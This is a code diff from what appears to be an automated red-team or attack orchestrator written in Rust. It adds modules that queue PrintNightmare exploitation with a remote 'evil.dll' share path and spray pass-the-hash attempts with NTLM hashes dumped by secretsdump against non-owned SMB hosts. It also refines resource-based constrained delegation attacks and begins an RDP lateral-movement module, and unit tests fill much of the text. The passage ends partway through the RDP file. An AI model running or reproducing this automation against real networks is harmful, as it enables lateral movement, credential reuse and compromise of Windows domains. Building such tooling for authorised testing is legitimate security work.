+ password: "P@ssw0rd!".to_string(), // pragma: allowlist secret
+ domain: domain.to_string(),
+ source: String::new(),
+ discovered_at: None,
+ is_admin: false,
+ parent_id: None,
+ attack_step: 0,
+ }
+ }
+
+ fn make_host(ip: &str, hostname: &str) -> ares_core::models::Host {
+ ares_core::models::Host {
+ ip: ip.to_string(),
+ hostname: hostname.to_string(),
+ os: String::new(),
+ roles: Vec::new(),
+ services: Vec::new(),
+ is_dc: false,
+ owned: false,
+ }
+ }
+
+ #[test]
+ fn collect_empty_state_produces_no_work() {
+ let state = StateInner::new("test".into());
+ let work = collect_print_nightmare_work(
+ &state,
+ "192.168.58.50",
+ "\\\\192.168.58.50\\share\\evil.dll",
+ );
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_no_credentials_produces_no_work() {
+ let mut state = StateInner::new("test".into());
+ state
+ .hosts
+ .push(make_host("192.168.58.22", "srv01.contoso.local"));
+ let work = collect_print_nightmare_work(
+ &state,
+ "192.168.58.50",
+ "\\\\192.168.58.50\\share\\evil.dll",
+ );
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_host_with_cred_produces_work() {
+ let mut state = StateInner::new("test".into());
+ state
+ .hosts
+ .push(make_host("192.168.58.22", "srv01.contoso.local"));
+ state.credentials.push(make_cred("admin", "contoso.local"));
+ let work = collect_print_nightmare_work(
+ &state,
+ "192.168.58.50",
+ "\\\\192.168.58.50\\share\\evil.dll",
+ );
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].target_ip, "192.168.58.22");
+ assert_eq!(work[0].hostname, "srv01.contoso.local");
+ assert_eq!(work[0].domain, "contoso.local");
+ assert_eq!(work[0].listener, "192.168.58.50");
+ assert_eq!(work[0].dll_path, "\\\\192.168.58.50\\share\\evil.dll");
+ assert_eq!(work[0].credential.username, "admin");
+ }
+
+ #[test]
+ fn collect_skips_already_processed_printnightmare() {
+ let mut state = StateInner::new("test".into());
+ state
+ .hosts
+ .push(make_host("192.168.58.22", "srv01.contoso.local"));
+ state.credentials.push(make_cred("admin", "contoso.local"));
+ state.mark_processed(DEDUP_PRINTNIGHTMARE, "192.168.58.22".into());
+ let work = collect_print_nightmare_work(
+ &state,
+ "192.168.58.50",
+ "\\\\192.168.58.50\\share\\evil.dll",
+ );
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_skips_already_secretsdumped_host() {
+ let mut state = StateInner::new("test".into());
+ state
+ .hosts
+ .push(make_host("192.168.58.22", "srv01.contoso.local"));
+ state.credentials.push(make_cred("admin", "contoso.local"));
+ state.mark_processed(DEDUP_SECRETSDUMP, "192.168.58.22".into());
+ let work = collect_print_nightmare_work(
+ &state,
+ "192.168.58.50",
+ "\\\\192.168.58.50\\share\\evil.dll",
+ );
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_prefers_same_domain_credential() {
+ let mut state = StateInner::new("test".into());
+ state
+ .hosts
+ .push(make_host("192.168.58.22", "srv01.contoso.local"));
+ state
+ .credentials
+ .push(make_cred("fab_user", "fabrikam.local"));
+ state
+ .credentials
+ .push(make_cred("con_user", "contoso.local"));
+ let work = collect_print_nightmare_work(
+ &state,
+ "192.168.58.50",
+ "\\\\192.168.58.50\\share\\evil.dll",
+ );
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "con_user");
+ }
+
+ #[test]
+ fn collect_falls_back_to_first_cred_for_bare_hostname() {
+ let mut state = StateInner::new("test".into());
+ state.hosts.push(make_host("192.168.58.22", "srv01"));
+ state
+ .credentials
+ .push(make_cred("fallback", "contoso.local"));
+ let work = collect_print_nightmare_work(
+ &state,
+ "192.168.58.50",
+ "\\\\192.168.58.50\\share\\evil.dll",
+ );
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "fallback");
+ assert_eq!(work[0].domain, "");
+ }
+
+ #[test]
+ fn collect_multiple_hosts_mixed() {
+ let mut state = StateInner::new("test".into());
+ state
+ .hosts
+ .push(make_host("192.168.58.22", "srv01.contoso.local"));
+ state
+ .hosts
+ .push(make_host("192.168.58.30", "ws01.fabrikam.local"));
+ state.credentials.push(make_cred("admin", "contoso.local"));
+ // Mark second host as already secretsdumped
+ state.mark_processed(DEDUP_SECRETSDUMP, "192.168.58.30".into());
+ let work = collect_print_nightmare_work(
+ &state,
+ "192.168.58.50",
+ "\\\\192.168.58.50\\share\\evil.dll",
+ );
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].target_ip, "192.168.58.22");
+ }
+
+ #[test]
+ fn dedup_key_format_validation() {
+ // PrintNightmare uses the raw target_ip as dedup key
+ let ip = "192.168.58.10";
+ // The dedup key is just the IP itself
+ assert_eq!(ip, "192.168.58.10");
+ assert!(!ip.contains(':'));
+ }
+}
diff --git a/ares-cli/src/orchestrator/automation/pth_spray.rs b/ares-cli/src/orchestrator/automation/pth_spray.rs
new file mode 100644
index 00000000..9641568d
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/pth_spray.rs
@@ -0,0 +1,788 @@
+//! auto_pth_spray -- pass-the-hash spray using dumped NTLM hashes.
+//!
+//! After secretsdump extracts NTLM hashes, this module sprays them across
+//! hosts to find additional admin access. Uses netexec/crackmapexec with
+//! NTLM hashes instead of passwords for lateral movement validation.
+//!
+//! This is distinct from credential_reuse (which tests passwords) and
+//! secretsdump (which dumps from owned hosts). PTH spray tests hash-based
+//! auth against non-owned hosts.
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+/// Dispatches pass-the-hash spray against non-owned hosts using dumped NTLM hashes.
+/// Interval: 45s.
+pub async fn auto_pth_spray(dispatcher: Arc, mut shutdown: watch::Receiver) {
+ let mut interval = tokio::time::interval(Duration::from_secs(45));
+ interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+ loop {
+ tokio::select! {
+ _ = interval.tick() => {},
+ _ = shutdown.changed() => break,
+ }
+ if *shutdown.borrow() {
+ break;
+ }
+
+ if !dispatcher.is_technique_allowed("pth_spray") {
+ continue;
+ }
+
+ let work: Vec = {
+ let state = dispatcher.state.read().await;
+ match collect_pth_work(&state) {
+ Some(items) => items,
+ None => continue,
+ }
+ };
+
+ // Limit to 5 per cycle to avoid overwhelming the throttler
+ for item in work.into_iter().take(5) {
+ let payload = json!({
+ "technique": "pass_the_hash",
+ "target_ip": item.target_ip,
+ "hostname": item.hostname,
+ "username": item.username,
+ "ntlm_hash": item.ntlm_hash,
+ "domain": item.domain,
+ "protocol": "smb",
+ });
+
+ let priority = dispatcher.effective_priority("pth_spray");
+ match dispatcher
+ .throttled_submit("lateral", "lateral", payload, priority)
+ .await
+ {
+ Ok(Some(task_id)) => {
+ info!(
+ task_id = %task_id,
+ host = %item.target_ip,
+ user = %item.username,
+ "PTH spray dispatched"
+ );
+ dispatcher
+ .state
+ .write()
+ .await
+ .mark_processed(DEDUP_PTH_SPRAY, item.dedup_key.clone());
+ let _ = dispatcher
+ .state
+ .persist_dedup(&dispatcher.queue, DEDUP_PTH_SPRAY, &item.dedup_key)
+ .await;
+ }
+ Ok(None) => {
+ debug!(host = %item.target_ip, "PTH spray deferred");
+ }
+ Err(e) => {
+ warn!(err = %e, host = %item.target_ip, "Failed to dispatch PTH spray");
+ }
+ }
+ }
+ }
+}
+
+/// Collects PTH spray work items from state. Returns `None` when there are no
+/// NTLM hashes (caller should skip the cycle).
+fn collect_pth_work(state: &StateInner) -> Option> {
+ // Need NTLM hashes
+ let ntlm_hashes: Vec<_> = state
+ .hashes
+ .iter()
+ .filter(|h| {
+ h.hash_type.to_lowercase().contains("ntlm")
+ && !h.hash_value.is_empty()
+ && h.hash_value.len() == 32
+ })
+ .collect();
+
+ if ntlm_hashes.is_empty() {
+ return None;
+ }
+
+ let mut items = Vec::new();
+
+ // For each non-owned host, try PTH with available NTLM hashes
+ for host in &state.hosts {
+ if host.owned {
+ continue;
+ }
+
+ // Check if host has SMB (port 445)
+ let has_smb = host.services.iter().any(|s| {
+ let sl = s.to_lowercase();
+ sl.contains("445") || sl.contains("smb") || sl.contains("cifs")
+ });
+ if !has_smb {
+ continue;
+ }
+
+ // Try each unique NTLM hash against this host
+ for hash in &ntlm_hashes {
+ let dedup_key = format!(
+ "pth:{}:{}:{}",
+ host.ip,
+ hash.username.to_lowercase(),
+ &hash.hash_value[..8]
+ );
+ if state.is_processed(DEDUP_PTH_SPRAY, &dedup_key) {
+ continue;
+ }
+
+ // Infer domain from hash or host
+ let domain = if !hash.domain.is_empty() {
+ hash.domain.clone()
+ } else {
+ host.hostname
+ .find('.')
+ .map(|i| host.hostname[i + 1..].to_string())
+ .unwrap_or_default()
+ };
+
+ items.push(PthWork {
+ dedup_key,
+ target_ip: host.ip.clone(),
+ hostname: host.hostname.clone(),
+ username: hash.username.clone(),
+ ntlm_hash: hash.hash_value.clone(),
+ domain,
+ });
+ }
+ }
+
+ Some(items)
+}
+
+struct PthWork {
+ dedup_key: String,
+ target_ip: String,
+ hostname: String,
+ username: String,
+ ntlm_hash: String,
+ domain: String,
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+ use ares_core::models::{Hash, Host};
+
+ fn make_ntlm_hash(username: &str, hash_value: &str, domain: &str) -> Hash {
+ Hash {
+ id: format!("hash-{username}"),
+ username: username.to_string(),
+ hash_value: hash_value.to_string(),
+ hash_type: "NTLM".to_string(),
+ domain: domain.to_string(),
+ cracked_password: None, // pragma: allowlist secret
+ source: "secretsdump".to_string(),
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ aes_key: None,
+ }
+ }
+
+ fn make_smb_host(ip: &str, hostname: &str, owned: bool) -> Host {
+ Host {
+ ip: ip.to_string(),
+ hostname: hostname.to_string(),
+ os: String::new(),
+ roles: Vec::new(),
+ services: vec!["445/tcp microsoft-ds".to_string()],
+ is_dc: false,
+ owned,
+ }
+ }
+
+ fn make_host_no_smb(ip: &str, hostname: &str) -> Host {
+ Host {
+ ip: ip.to_string(),
+ hostname: hostname.to_string(),
+ os: String::new(),
+ roles: Vec::new(),
+ services: vec!["80/tcp http".to_string()],
+ is_dc: false,
+ owned: false,
+ }
+ }
+
+ #[test]
+ fn dedup_key_format() {
+ let key = format!("pth:{}:{}:{}", "192.168.58.10", "admin", "aabbccdd");
+ assert_eq!(key, "pth:192.168.58.10:admin:aabbccdd");
+ }
+
+ #[test]
+ fn dedup_set_name() {
+ assert_eq!(DEDUP_PTH_SPRAY, "pth_spray");
+ }
+
+ #[test]
+ fn ntlm_hash_filter_valid() {
+ let hash_type = "NTLM";
+ let hash_value = "aad3b435b51404eeaad3b435b51404ee";
+ assert!(hash_type.to_lowercase().contains("ntlm"));
+ assert!(!hash_value.is_empty());
+ assert_eq!(hash_value.len(), 32);
+ }
+
+ #[test]
+ fn ntlm_hash_filter_rejects_short() {
+ let hash_value = "abc123";
+ assert_ne!(hash_value.len(), 32);
+ }
+
+ #[test]
+ fn ntlm_hash_filter_rejects_empty() {
+ let hash_value = "";
+ assert!(hash_value.is_empty());
+ }
+
+ #[test]
+ fn ntlm_hash_filter_rejects_non_ntlm() {
+ let hash_type = "aes256-cts-hmac-sha1-96";
+ assert!(!hash_type.to_lowercase().contains("ntlm"));
+ }
+
+ #[test]
+ fn smb_service_detection() {
+ let services = ["445/tcp microsoft-ds".to_string()];
+ let has_smb = services.iter().any(|s| {
+ let sl = s.to_lowercase();
+ sl.contains("445") || sl.contains("smb") || sl.contains("cifs")
+ });
+ assert!(has_smb);
+ }
+
+ #[test]
+ fn no_smb_service() {
+ let services = ["80/tcp http".to_string()];
+ let has_smb = services.iter().any(|s| {
+ let sl = s.to_lowercase();
+ sl.contains("445") || sl.contains("smb") || sl.contains("cifs")
+ });
+ assert!(!has_smb);
+ }
+
+ #[test]
+ fn domain_from_hash_preferred() {
+ let hash_domain = "contoso.local";
+ let hostname = "srv01.fabrikam.local";
+ let domain = if !hash_domain.is_empty() {
+ hash_domain.to_string()
+ } else {
+ hostname
+ .find('.')
+ .map(|i| hostname[i + 1..].to_string())
+ .unwrap_or_default()
+ };
+ assert_eq!(domain, "contoso.local");
+ }
+
+ #[test]
+ fn domain_fallback_to_hostname() {
+ let hash_domain = "";
+ let hostname = "srv01.fabrikam.local";
+ let domain = if !hash_domain.is_empty() {
+ hash_domain.to_string()
+ } else {
+ hostname
+ .find('.')
+ .map(|i| hostname[i + 1..].to_string())
+ .unwrap_or_default()
+ };
+ assert_eq!(domain, "fabrikam.local");
+ }
+
+ #[test]
+ fn dedup_key_uses_hash_prefix() {
+ let ip = "192.168.58.10";
+ let username = "Admin";
+ let hash_value = "aad3b435b51404eeaad3b435b51404ee";
+ let dedup_key = format!(
+ "pth:{}:{}:{}",
+ ip,
+ username.to_lowercase(),
+ &hash_value[..8]
+ );
+ assert_eq!(dedup_key, "pth:192.168.58.10:admin:aad3b435");
+ }
+
+ #[test]
+ fn ntlm_hash_filter_exact_32() {
+ let hash = "a".repeat(32);
+ assert_eq!(hash.len(), 32);
+ assert!(!hash.is_empty());
+ }
+
+ #[test]
+ fn ntlm_hash_type_variations() {
+ for t in ["NTLM", "ntlm", "NT", "ntlm_hash"] {
+ assert!(t.to_lowercase().contains("ntlm") || t.to_lowercase().contains("nt"));
+ }
+ }
+
+ #[test]
+ fn smb_service_detection_cifs() {
+ let services = ["cifs".to_string()];
+ let has_smb = services.iter().any(|s| {
+ let sl = s.to_lowercase();
+ sl.contains("445") || sl.contains("smb") || sl.contains("cifs")
+ });
+ assert!(has_smb);
+ }
+
+ #[test]
+ fn pth_payload_structure() {
+ let payload = serde_json::json!({
+ "technique": "pass_the_hash",
+ "target_ip": "192.168.58.22",
+ "hostname": "srv01.contoso.local",
+ "username": "admin",
+ "ntlm_hash": "aad3b435b51404eeaad3b435b51404ee",
+ "domain": "contoso.local",
+ "protocol": "smb",
+ });
+ assert_eq!(payload["technique"], "pass_the_hash");
+ assert_eq!(payload["protocol"], "smb");
+ assert_eq!(payload["ntlm_hash"], "aad3b435b51404eeaad3b435b51404ee");
+ }
+
+ #[test]
+ fn pth_work_construction() {
+ let work = PthWork {
+ dedup_key: "pth:192.168.58.22:admin:aad3b435".into(),
+ target_ip: "192.168.58.22".into(),
+ hostname: "srv01.contoso.local".into(),
+ username: "admin".into(),
+ ntlm_hash: "aad3b435b51404eeaad3b435b51404ee".into(),
+ domain: "contoso.local".into(),
+ };
+ assert_eq!(work.username, "admin");
+ assert_eq!(work.ntlm_hash.len(), 32);
+ }
+
+ #[test]
+ fn domain_fallback_bare_hostname() {
+ let hash_domain = "";
+ let hostname = "srv01";
+ let domain = if !hash_domain.is_empty() {
+ hash_domain.to_string()
+ } else {
+ hostname
+ .find('.')
+ .map(|i| hostname[i + 1..].to_string())
+ .unwrap_or_default()
+ };
+ assert_eq!(domain, "");
+ }
+
+ #[test]
+ fn take_5_limiting() {
+ let items: Vec = (0..20).collect();
+ let taken: Vec<_> = items.into_iter().take(5).collect();
+ assert_eq!(taken.len(), 5);
+ }
+
+ // --- collect_pth_work tests ---
+
+ #[test]
+ fn collect_empty_state_returns_none() {
+ let state = StateInner::new("test".into());
+ assert!(collect_pth_work(&state).is_none());
+ }
+
+ #[test]
+ fn collect_no_hashes_returns_none() {
+ let mut state = StateInner::new("test".into());
+ state
+ .hosts
+ .push(make_smb_host("192.168.58.10", "srv01.contoso.local", false));
+ assert!(collect_pth_work(&state).is_none());
+ }
+
+ #[test]
+ fn collect_hashes_no_hosts_returns_empty() {
+ let mut state = StateInner::new("test".into());
+ state.hashes.push(make_ntlm_hash(
+ "admin",
+ "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret
+ "contoso.local",
+ ));
+ let work = collect_pth_work(&state).unwrap();
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_hash_and_smb_host_produces_work() {
+ let mut state = StateInner::new("test".into());
+ state.hashes.push(make_ntlm_hash(
+ "admin",
+ "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret
+ "contoso.local",
+ ));
+ state
+ .hosts
+ .push(make_smb_host("192.168.58.10", "srv01.contoso.local", false));
+ let work = collect_pth_work(&state).unwrap();
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].target_ip, "192.168.58.10");
+ assert_eq!(work[0].username, "admin");
+ assert_eq!(work[0].domain, "contoso.local");
+ assert_eq!(work[0].ntlm_hash, "aad3b435b51404eeaad3b435b51404ee");
+ }
+
+ #[test]
+ fn collect_skips_owned_hosts() {
+ let mut state = StateInner::new("test".into());
+ state.hashes.push(make_ntlm_hash(
+ "admin",
+ "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret
+ "contoso.local",
+ ));
+ state.hosts.push(make_smb_host(
+ "192.168.58.10",
+ "srv01.contoso.local",
+ true, // owned
+ ));
+ let work = collect_pth_work(&state).unwrap();
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_skips_non_smb_hosts() {
+ let mut state = StateInner::new("test".into());
+ state.hashes.push(make_ntlm_hash(
+ "admin",
+ "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret
+ "contoso.local",
+ ));
+ state
+ .hosts
+ .push(make_host_no_smb("192.168.58.20", "web01.contoso.local"));
+ let work = collect_pth_work(&state).unwrap();
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_skips_dedup_processed() {
+ let mut state = StateInner::new("test".into());
+ state.hashes.push(make_ntlm_hash(
+ "admin",
+ "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret
+ "contoso.local",
+ ));
+ state
+ .hosts
+ .push(make_smb_host("192.168.58.10", "srv01.contoso.local", false));
+ // Mark as already processed
+ state.mark_processed(
+ DEDUP_PTH_SPRAY,
+ "pth:192.168.58.10:admin:aad3b435".to_string(),
+ );
+ let work = collect_pth_work(&state).unwrap();
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_filters_non_ntlm_hashes() {
+ let mut state = StateInner::new("test".into());
+ state.hashes.push(Hash {
+ id: "hash-aes".into(),
+ username: "admin".into(),
+ hash_value: "abcdef1234567890abcdef1234567890".into(), // pragma: allowlist secret
+ hash_type: "aes256-cts-hmac-sha1-96".into(),
+ domain: "contoso.local".into(),
+ cracked_password: None, // pragma: allowlist secret
+ source: "secretsdump".into(),
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ aes_key: None,
+ });
+ state
+ .hosts
+ .push(make_smb_host("192.168.58.10", "srv01.contoso.local", false));
+ // AES hash type should be rejected
+ assert!(collect_pth_work(&state).is_none());
+ }
+
+ #[test]
+ fn collect_filters_short_hash_values() {
+ let mut state = StateInner::new("test".into());
+ state.hashes.push(make_ntlm_hash(
+ "admin",
+ "aad3b435", // too short, not 32 chars - pragma: allowlist secret
+ "contoso.local",
+ ));
+ state
+ .hosts
+ .push(make_smb_host("192.168.58.10", "srv01.contoso.local", false));
+ assert!(collect_pth_work(&state).is_none());
+ }
+
+ #[test]
+ fn collect_filters_empty_hash_values() {
+ let mut state = StateInner::new("test".into());
+ state.hashes.push(make_ntlm_hash(
+ "admin",
+ "", // empty - pragma: allowlist secret
+ "contoso.local",
+ ));
+ state
+ .hosts
+ .push(make_smb_host("192.168.58.10", "srv01.contoso.local", false));
+ assert!(collect_pth_work(&state).is_none());
+ }
+
+ #[test]
+ fn collect_domain_fallback_from_hostname() {
+ let mut state = StateInner::new("test".into());
+ state.hashes.push(make_ntlm_hash(
+ "admin",
+ "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret
+ "", // empty domain on hash
+ ));
+ state.hosts.push(make_smb_host(
+ "192.168.58.10",
+ "srv01.fabrikam.local",
+ false,
+ ));
+ let work = collect_pth_work(&state).unwrap();
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "fabrikam.local");
+ }
+
+ #[test]
+ fn collect_domain_fallback_bare_hostname_empty() {
+ let mut state = StateInner::new("test".into());
+ state.hashes.push(make_ntlm_hash(
+ "admin",
+ "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret
+ "", // empty domain on hash
+ ));
+ state.hosts.push(make_smb_host(
+ "192.168.58.10",
+ "srv01", // no dot, no domain part
+ false,
+ ));
+ let work = collect_pth_work(&state).unwrap();
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "");
+ }
+
+ #[test]
+ fn collect_multiple_hashes_multiple_hosts() {
+ let mut state = StateInner::new("test".into());
+ state.hashes.push(make_ntlm_hash(
+ "admin",
+ "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret
+ "contoso.local",
+ ));
+ state.hashes.push(make_ntlm_hash(
+ "svcacct",
+ "bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb", // pragma: allowlist secret
+ "contoso.local",
+ ));
+ state
+ .hosts
+ .push(make_smb_host("192.168.58.10", "srv01.contoso.local", false));
+ state
+ .hosts
+ .push(make_smb_host("192.168.58.20", "srv02.contoso.local", false));
+ let work = collect_pth_work(&state).unwrap();
+ // 2 hashes x 2 hosts = 4 work items
+ assert_eq!(work.len(), 4);
+ }
+
+ #[test]
+ fn collect_dedup_key_lowercases_username() {
+ let mut state = StateInner::new("test".into());
+ state.hashes.push(make_ntlm_hash(
+ "Administrator",
+ "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret
+ "contoso.local",
+ ));
+ state
+ .hosts
+ .push(make_smb_host("192.168.58.10", "srv01.contoso.local", false));
+ let work = collect_pth_work(&state).unwrap();
+ assert_eq!(work.len(), 1);
+ assert!(work[0].dedup_key.contains(":administrator:"));
+ }
+
+ #[test]
+ fn collect_mixed_owned_and_unowned_hosts() {
+ let mut state = StateInner::new("test".into());
+ state.hashes.push(make_ntlm_hash(
+ "admin",
+ "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret
+ "contoso.local",
+ ));
+ state.hosts.push(make_smb_host(
+ "192.168.58.10",
+ "srv01.contoso.local",
+ true, // owned
+ ));
+ state.hosts.push(make_smb_host(
+ "192.168.58.20",
+ "srv02.contoso.local",
+ false, // not owned
+ ));
+ let work = collect_pth_work(&state).unwrap();
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].target_ip, "192.168.58.20");
+ }
+
+ #[test]
+ fn collect_mixed_smb_and_non_smb_hosts() {
+ let mut state = StateInner::new("test".into());
+ state.hashes.push(make_ntlm_hash(
+ "admin",
+ "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret
+ "contoso.local",
+ ));
+ state
+ .hosts
+ .push(make_host_no_smb("192.168.58.10", "web01.contoso.local"));
+ state
+ .hosts
+ .push(make_smb_host("192.168.58.20", "srv01.contoso.local", false));
+ let work = collect_pth_work(&state).unwrap();
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].target_ip, "192.168.58.20");
+ }
+
+ #[test]
+ fn collect_smb_detection_via_smb_string() {
+ let mut state = StateInner::new("test".into());
+ state.hashes.push(make_ntlm_hash(
+ "admin",
+ "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret
+ "contoso.local",
+ ));
+ state.hosts.push(Host {
+ ip: "192.168.58.10".into(),
+ hostname: "srv01.contoso.local".into(),
+ os: String::new(),
+ roles: Vec::new(),
+ services: vec!["SMB".to_string()],
+ is_dc: false,
+ owned: false,
+ });
+ let work = collect_pth_work(&state).unwrap();
+ assert_eq!(work.len(), 1);
+ }
+
+ #[test]
+ fn collect_smb_detection_via_cifs_string() {
+ let mut state = StateInner::new("test".into());
+ state.hashes.push(make_ntlm_hash(
+ "admin",
+ "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret
+ "contoso.local",
+ ));
+ state.hosts.push(Host {
+ ip: "192.168.58.10".into(),
+ hostname: "srv01.contoso.local".into(),
+ os: String::new(),
+ roles: Vec::new(),
+ services: vec!["cifs/srv01.contoso.local".to_string()],
+ is_dc: false,
+ owned: false,
+ });
+ let work = collect_pth_work(&state).unwrap();
+ assert_eq!(work.len(), 1);
+ }
+
+ #[test]
+ fn collect_partial_dedup_only_skips_processed() {
+ let mut state = StateInner::new("test".into());
+ state.hashes.push(make_ntlm_hash(
+ "admin",
+ "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret
+ "contoso.local",
+ ));
+ state.hashes.push(make_ntlm_hash(
+ "svcacct",
+ "bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb", // pragma: allowlist secret
+ "contoso.local",
+ ));
+ state
+ .hosts
+ .push(make_smb_host("192.168.58.10", "srv01.contoso.local", false));
+ // Mark only admin as processed
+ state.mark_processed(
+ DEDUP_PTH_SPRAY,
+ "pth:192.168.58.10:admin:aad3b435".to_string(),
+ );
+ let work = collect_pth_work(&state).unwrap();
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].username, "svcacct");
+ }
+
+ #[test]
+ fn collect_hostname_preserved_in_work() {
+ let mut state = StateInner::new("test".into());
+ state.hashes.push(make_ntlm_hash(
+ "admin",
+ "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret
+ "contoso.local",
+ ));
+ state
+ .hosts
+ .push(make_smb_host("192.168.58.10", "dc01.contoso.local", false));
+ let work = collect_pth_work(&state).unwrap();
+ assert_eq!(work[0].hostname, "dc01.contoso.local");
+ }
+
+ #[test]
+ fn collect_hash_domain_preferred_over_hostname_domain() {
+ let mut state = StateInner::new("test".into());
+ state.hashes.push(make_ntlm_hash(
+ "admin",
+ "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret
+ "contoso.local",
+ ));
+ state.hosts.push(make_smb_host(
+ "192.168.58.10",
+ "srv01.fabrikam.local",
+ false,
+ ));
+ let work = collect_pth_work(&state).unwrap();
+ // Hash domain takes priority over hostname domain
+ assert_eq!(work[0].domain, "contoso.local");
+ }
+
+ #[test]
+ fn collect_ntlm_hash_type_case_insensitive() {
+ let mut state = StateInner::new("test".into());
+ state.hashes.push(Hash {
+ id: "hash-1".into(),
+ username: "admin".into(),
+ hash_value: "aad3b435b51404eeaad3b435b51404ee".into(), // pragma: allowlist secret
+ hash_type: "Ntlm".into(), // mixed case
+ domain: "contoso.local".into(),
+ cracked_password: None, // pragma: allowlist secret
+ source: "secretsdump".into(),
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ aes_key: None,
+ });
+ state
+ .hosts
+ .push(make_smb_host("192.168.58.10", "srv01.contoso.local", false));
+ let work = collect_pth_work(&state).unwrap();
+ assert_eq!(work.len(), 1);
+ }
+}
diff --git a/ares-cli/src/orchestrator/automation/rbcd.rs b/ares-cli/src/orchestrator/automation/rbcd.rs
index b28228c6..5f487a75 100644
--- a/ares-cli/src/orchestrator/automation/rbcd.rs
+++ b/ares-cli/src/orchestrator/automation/rbcd.rs
@@ -14,6 +14,7 @@ use serde_json::json;
use tokio::sync::watch;
use tracing::{debug, info, warn};
+use crate::dedup::is_ghost_machine_account;
use crate::orchestrator::dispatcher::Dispatcher;
/// Dedup key prefix for RBCD attacks.
@@ -91,6 +92,14 @@ pub async fn auto_rbcd_exploitation(
.or_else(|| vuln.details.get("victim"))
.and_then(|v| v.as_str())
.map(|s| s.to_string())?;
+ if is_ghost_machine_account(&target_computer) {
+ debug!(
+ vuln_id = %vuln.vuln_id,
+ target = %target_computer,
+ "RBCD skipped: ghost machine account target"
+ );
+ return None;
+ }
let domain = vuln
.details
@@ -99,28 +108,14 @@ pub async fn auto_rbcd_exploitation(
.unwrap_or("")
.to_string();
- // Find credential for the source user
- let credential = state
- .credentials
- .iter()
- .find(|c| {
- c.username.to_lowercase() == source_user.to_lowercase()
- && (domain.is_empty()
- || c.domain.to_lowercase() == domain.to_lowercase())
- })
- .cloned();
-
+ // Find credential for the source user. Cross-forest ACL
+ // edges (e.g. leo@contoso → sql01$@fabrikam) put the
+ // source user in a different domain than the vuln's `domain`
+ // field (which is the target's domain), so we cannot
+ // domain-restrict against the target.
+ let credential = state.find_source_credential(&source_user, &domain);
let hash = if credential.is_none() {
- state
- .hashes
- .iter()
- .find(|h| {
- h.username.to_lowercase() == source_user.to_lowercase()
- && h.hash_type.to_uppercase() == "NTLM"
- && (domain.is_empty()
- || h.domain.to_lowercase() == domain.to_lowercase())
- })
- .cloned()
+ state.find_source_hash(&source_user, &domain)
} else {
None
};
@@ -296,6 +291,11 @@ mod tests {
assert!(!is_rbcd_candidate("shadow_credentials", Some("Computer")));
}
+ #[test]
+ fn ghost_machine_target_detected() {
+ assert!(is_ghost_machine_account("WIN-DPPJMLU3XS6$"));
+ }
+
#[test]
fn resolve_computer_ip_exact_match() {
let hosts = vec![
diff --git a/ares-cli/src/orchestrator/automation/rdp_lateral.rs b/ares-cli/src/orchestrator/automation/rdp_lateral.rs
new file mode 100644
index 00000000..5c984dce
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/rdp_lateral.rs
@@ -0,0 +1,716 @@
+//! auto_rdp_lateral -- RDP lateral movement to hosts with port 3389.
+//!
+//! Targets hosts with RDP service (port 3389) that are not yet owned.
+//! Uses xfreerdp or similar tooling to authenticate and execute commands
+//! via RDP, complementing WinRM lateral movement for hosts that only
+//! expose RDP.
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+/// RDP lateral movement to hosts with port 3389.
+/// Interval: 45s.
+pub async fn auto_rdp_lateral(dispatcher: Arc, mut shutdown: watch::Receiver) {
+ let mut interval = tokio::time::interval(Duration::from_secs(45));
+ interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+ loop {
+ tokio::select! {
